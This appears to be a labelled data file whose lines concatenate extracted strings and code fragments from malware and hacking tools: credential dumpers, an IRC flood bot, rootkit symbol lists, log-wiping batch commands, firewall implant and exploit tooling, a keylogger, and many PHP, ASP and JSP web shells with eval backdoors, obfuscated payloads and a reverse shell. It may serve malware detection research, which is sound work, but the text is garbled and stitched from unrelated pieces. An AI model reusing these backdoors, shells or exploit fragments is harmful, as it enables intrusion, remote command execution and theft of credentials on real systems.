1 [mimikittenz.memprocinspector]process_all_access = process_terminate | process_create_thread | process_set_sessionid | process_vm_operation |intptr processhandle = minterop.openprocess(minterop.process_wm_read | minterop.process_query_information, false, process.id);&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=[dllimport(\"kernel32.dll\", setlasterror = true)]3aesversonex12cupdategates11cupdatebillzn8cutility7decryptepcipkcizn13cthreadattack5startep11ccmdmessagemr.blackvers0nex:%s|%d|%d|%sprivmsg %s :[std]hitting %snotice %s :tsunami <target> <secs>notice %s :i'm having a problem resolving my host, someone will have to spoofs me manually.sys_writesys_getdentssys_getdents64sys_getpgidsys_getsidsys_setpgidsys_killsys_tgkillsys_tkillsys_sched_setschedulersys_sched_setparamsys_sched_getschedulersys_sched_getparamsys_sched_setaffinitysys_sched_getaffinitysys_sched_rr_get_intervalsys_wait4sys_waitidsys_rt_tgsigqueueinfosys_rt_sigqueueinfosys_prlimit64sys_ptracesys_migrate_pagessys_move_pagessys_get_robust_listsys_perf_event_opensys_unamesys_unlinksys_unlikatsys_renamesys_readkobject_dellist_del_initinet_ioctlset_fs_rootset_fs_pwd__virt_addr_validinit_fsbad_file_opsbad_file_aio_readsecurity_opsdefault_security_opsaudit_enabledcommit_credsprepare_kernel_credptmx_fopsnode_statesdlopendlsymfopen64__fxstat__fxstat64__lxstat__lxstat64rmdir__xstat__xstat64fdopendir
1 dbnextrow[usage]: %s <hostname|ip> <username> <password>=============by uhhuhy(feb 18,2003) - http://www.cnhonker.net=============cool! connected to sql server on %s successfully!exec master..xp_cmdshell \"%s\"=======================sqlcmd v0.21 for hscan v1.20=======================error,exit!sqlcmd>h
1 beijing1del /f /s /q %systemdrive%\\*.log del /f /s /q %windir%\\*.bak del /f /s /q %systemdrive%\\*.chk del /f /s /q %systemdrive%\\*.tmp del /f /q %userprofile%\\cookies s\\*.* rd /s /q %windir%\\temp & md %windir%\\temp del /f /s /q %systemdrive%\\recycled\\*.* del /f /s /q \"%userprofile%\\local settings\\temp\\*.*\" del /f /s /q \"%userprofile%\\local settings\\temporary internet files\\*.*\" tasklist |find \"clear.bat\"||start clear.bathttp://www.coffeewl.comping -n 2 localhost 1>nul 2>nulfor /l %%a in (mode con: cols=42 lines=5text files (*.txt);;all files (*)http://ubrute.comip - %d; password - %d; combination - %dget_crackedcredentialss
1 @stego:syswrite(stdout, \"content-type: text/html\\r\\n\\r\\n\", 27);s/%20/ /ig;syswrite(stdout, \"\\r\\n</pre></html>\\r\\n\", 17);open(stderr, \">&stdout\") || die \"can't redirect stderr\";$_ = $env{query_string};$execthis = $_;system($execthis);s/%2f/\\//ig;<form action=\"changepwd.asp\" method=\"post\"> set ouser = getobject(\"winnt://computername/\" & username) value=\"<%=request.servervariables(\"login_user\")%>\"> windows 2000 oldpwd = request.form(\"oldpwd\") newpwd2 = request.form(\"newpwd2\") newpwd1 = request.form(\"newpwd1\") made to port 80 of the remote machine at 192.168.1.101 with theunable to resolve hostname \"%s\"source port for that outbound connection being set to 53 also. -s - outbound source port numberattempting to connect to %s port %dusage: concon \\\\ip\\sharename\\con\\conexitcode = oshell.run(\"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, oshell.run \"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, falseechob(\"regsvr32.exe exitcode = \" & exitcode)public property get ofs()cleanip - specify ip address which you want clear.logfile - specify log file which you want process.cleaniislog vermsftpsvcfatal error: mfc initialization failedspecified \"all\" will process all log files.specified \".\" will clean all ip record.service %s stopped.process log file %s...power by eyas<cooleyas@21cn.com>\\ipc$ \"\" /user:\"\"sqlcheck can only scan a class b network. try again.example: sqlcheck 192.168.0.1 192.168.0.254usage: sqlcheck <startip> <endip>runasex by assassin 2000. all rights reserved. http://www.netxeyes.comnote: this program can'nt run with local machine.%s execute succussifully.usage: runasex <username> <password> <execute file> [\"execute option\"]creation of results file - \"%s\" failed.c:\\>nbtdump remote-machinecerberus nbtdump<center><h1>cerberus internet scanner</h1><
1 binbuckset_accountset_passwordset_usernameset_descriptionset_displaynameset_servicenamebadvpn-1copyright (c) 2010 ambroz bizjak <ambrop7@gmail.com>badvpn udpgwshownewsidtvtsvc is running#============upload ok !==============##=========upload execute ok !=========##========update execute ok !==========#process do not exit in 10 second, so i kill it!
1 x_id: x_os: x_bv: initializesecuritydescriptormozilla/4.0 (compatible; msie 7.0; windows nt 5.1; sv1)usage: -[start|stop|install|uninstall\\system32\\sc.exe config lanmanworkstationmcfmisvclsremoraservpwfgdumpfgexecfgexecpipeosql\\srcosqluserosqlpasswordosqlservercmd /c net start %s%add%kartoxaa
1 ./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=na -p 22 -t target_ip, --target_ip=target_ip -- either 127.0.0.1 or win ops ip./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport rhp --dport rhp--target_vers=target_vers target pix version (pix712, asa804) (required)-p dest_port, --dest_port=dest_port defaults: telnet=23, ssh=22 (optional) - change to local redirect portthis operation is complete, bananaglee willcd /current/bin/fw/bgxxxx/install/lpprofprocesspacketgettimeslotcmdhandlergetipipcmdhandlerprofstartscantmpdata.1resetcmdhandlercd /current/bin/fw/bananaglee/$bgver/install/lp/jetplow***** please place your ua in /current/bin/fw/ops *****ln -s ../jp/orig_code.bin orig_code_pixgen.bin***** welcome to jetplow *****get_lsl_interfacesencryptfc4payloadbeacon_getconfigformbeaconpacketbeacon_reconfiguredumpconfiggetstatushandlerxtractdatato disable password checking on target:[-] target is running[-] problem importing version-specific shellcode from[+] importing version-specific shellcode[-] unsupported target version, abortthe --spoof option requires 3 or 4 fields as follows redir_ip[-] timeout waiting for response - target may have crashed[-] no response from health check - target may have crashedmemset 00e9a05c 4 38845b88_hidecmdmemset 013abd04 1 0dcould not connect to target device: %s:%d. please check ip address.command data size is invalid for an exec cmda script was specified but target is not a ppc405-based netscreen (ns5xt, ns25, and ns50). executing scripts is supported but maexecute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]execute 0x%08x with args (%08x, %08x, %08x): [y/n][%d] execute code.execute 0x%08x with args (%08x): [y/n]dump_value_lhash_doall_argeggcode is complete. pass execution to it? [y/n]required by seconddatehelp='output file name (optional). by default the resulting data is written to stdout.')data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"version='%prog 1.0',usage='%prog [ ... options ... ] url',readflashhandlerflashrtnspix6x.cfix_ip_cksum_incrwriteflashhandlerusage %s \"<tcpdump pcap string>\" <outfile>error reading dump file: %struncated dump file; tried to read %u captured bytes, only got %lu%s: link-layer type %d isn't supported in savefilesdlt %d is not one of the dlts supported by this deviceusage: storefc.py --configfile=<path to xml file> --implantfile=<path to binstore implant> [--outputfile=<file to write the confraise exception, \"must supply both a config file and implant file.\"this is wrapper for store.py that felonycrowbar will use. thisdef hexdump(x,lead=\"[+] \",out=sys.stdout):print >>out, \"%s%04x \" % (lead,i),print >>out, \"%02x\" % ord(x[i+j]),print >>out, sane(x[i:i+16])components/modules/biosmodule/implant/e28f6/../e28f640j3_asm.scmosreadbytechecksumareaconfirmed.0writespeedplow.c--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)%s version %s already has persistence installed. if you want to uninstall,the active module(s) on the target are not meant to be persistedlp.c:pixsecurity - improper number of bytes read in security/interface informationlp.c:pixsecurity - not in sessiongetmodinterface__preloadedmodulesshowcommandsreadmoduleinterfacewrapping_not_necessary_or_wrapping_okget_cmd_listlp_listen2killcmdlistmodule and implant versions do not match. this module is not compatible with the target implant%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.log%s/bf_%04d%02d%02d.log%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.bin* not attempting to execute \"%s\" commandterminating script (command error or \"quit\" encountered)execute code in <file> passing <argx> (hex)* use arrow keys to scroll through command historypitcmd_processcmdlineexecute all commands in <file>__processshellcmdpittarget_getdstport__processsettargetiplogging commands and output - onthis command is too dangerous. if you'd like to run it, contact the development teamimplant version-specific values:this function should not be used with a netscreen, something has gone horribly wrongcreatesendrecv: recv'd an error from the target.error: watchdogtimeout read returned %d instead of 4command has not yet been codedbeacon domain : www.%s.comthis command can only be run on a pix/asawarning! bad or missing flash values (in section 2 of .dat file)printing the interface info and security levels. pix only.incomplete and must be removed manually.)%s: recv'd an error from the target.unable to fetch the address to the get_uptime_secs function for this os versionupload/activate/de-activate/remove/cmd function faileddo you wish to activate the implant that is already on the firewall? (y/n): there is no implant present on the firewall.implant version :%lx%lx%lxyou may now connect to the implant using the pbd idkeyno reply from persistant back door.rm -rf pbd.wc; wc -c %s > pbd.wcpbd_getversionpbd/pbdencrypt.binpbd/pbdgetversion.pktpbd/pbdstartwrite.binpbd/pbd_setnewhookpt.pktpbd/pbd_upload_singlepkt.pktunable to fetch hook and jmp addresses for this os versioncould not get hook and jump addressesenter the name of a clean implant binary (not an image):unable to read dat file for os version 0x%08lxinvalid implant fileprint \"[+] connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])@overridable(\"must be overriden if the target will be touched. base implementation should not be called.\")@overridable(\"must be overriden. base implementation should not be called.\")exp.load_vinfo()if not okay and self.terminateflingonexception:print \"[-] keyboard interrupt before response received\"if self.terminateflingonexception:print 'debug info ','='*40modules persistence file written successfullymodules persistence data successfully removedno modules are active on the firewall, nothing to persisterror while attemping to persist modules:error while reading interface info from pixlp.c:pixfree - failed to get responsewarning: lp timeout specified (%lu seconds) less than default (%u seconds). setting defaultunable to fetch config address for this os versionlp.c: interface information not available for this session[%s:%s:%d] error: extract_fgbgwarning: session may not have been closed!exec packet processedfailed to insert the command into command list.send_packet: trying to send too much data.payloadlength >= max_allow_size.wrong payload sizeunknown packet received......returned eax = %08xlogging.error(\" perhaps you should run with --scan?\")logging.error(\"error: no entry for etag [%s] in %s.\" %\"be supplied\")received prompt, we're infailed to login, bad creds, abortsending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + received nat - epba: ok, payload: mangled, did not runno status returned from target, could be an exploit failure, or this is a version where we don't expect a stus returnreceived arp - epba: ok, payload: failchopped = string.rstrip(payload, \"\\x0a\")shstrtab
1 %sspyagent password has been successfully changed.error: you need to set your spyagent password before proceeding.click the \"set password\" button in the \"options\" dialog to set your password!spyagent keystrokes log viewerc:\\source\\spyagent7\\release\\autoi.pdb.
1 press any keenter 1 obon >0 & <65535l--choose versionexa only runtuzemcpysetprintf\\wsftartupresponse.write \"command completed success!\" for each co in foditems <input type=text name=text6 value=\"<%= szcmd6 %>\"><br> <title>hello! welcome </title>%s -install -->to install the service%s -start -->to start the service%s -stop -->to stop the servicethe port is out of rangefail to set the port\\psapi.dlltinject.dllsoftware\\microsoft\\internet explorer\\wineggdropshellinjectt.exesniffer.dll:execute net.exe user administrator passfport.exe or mport.exe :password sniffering is running |not running : the terminal service port has been set to newport: del www.exe :dir *.exe param = \"driver={microsoft access driver (*.mdb)}\" conn.open param & \";dbq=\" & server.mappath(\"scjh.mdb\") set rs=conn.execute (sql)%> <%set conn = server.createobject(\"adodb.connection\") <%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh sql=\"select * from scjh\" e
1 ' *** written by tim medin <tim@counterhack.com>response.binarywrite(stream.read)response.write(response.status & request.servervariables(\"remote_addr\"))%><a href=\"<%=request.servervariables(\"url\")%>\">web root</a><br/><%set folder = fso.getfolder(path)set file = fso.getfile(filepath)if ($_server[\"remote_addr\"] == $ip)header(\"http/1.0 404 not found\");<?php echo exec('killall nc');?><title>laudanum kill nc</title>foreach ($allowedips as $ip) {<form action=\"shell.asp\" method=\"post\" name=\"shell\">%comspec% /c dirset objcmd = wshell.exec(cmd)server.scripttimeout = 180cmd = request.form(\"cmd\")' *** http://laudanum.secureideas.netdim wshell, intreturn, strpresultport: <input name=\"port\" type=\"text\" value=\"8888\"><li>reverse shell - <li><a href=\"<?php echo plugins_url('file.php', __file__);?>\">file browser</a>'response.write \"<br/> -value:\" & request.querystring(key)(j)q = q & \"&\" & key & \"=\" & request.querystring(key)(j)for each i in split(http.getallresponseheaders, vblf)'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)s = urlscheme & urlhost & urlport & urlpathset http = server.createobject(\"microsoft.xmlhttp\")executable: <input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br><cfif ( #suppliedcode# neq secretcode )><cfif isdefined(\"form.cmd\")>remoteip = httpcontext.current.request.headers[\"x-forwarded-for\"].split(newremoteip = request.userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? $_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], $_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' - antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" 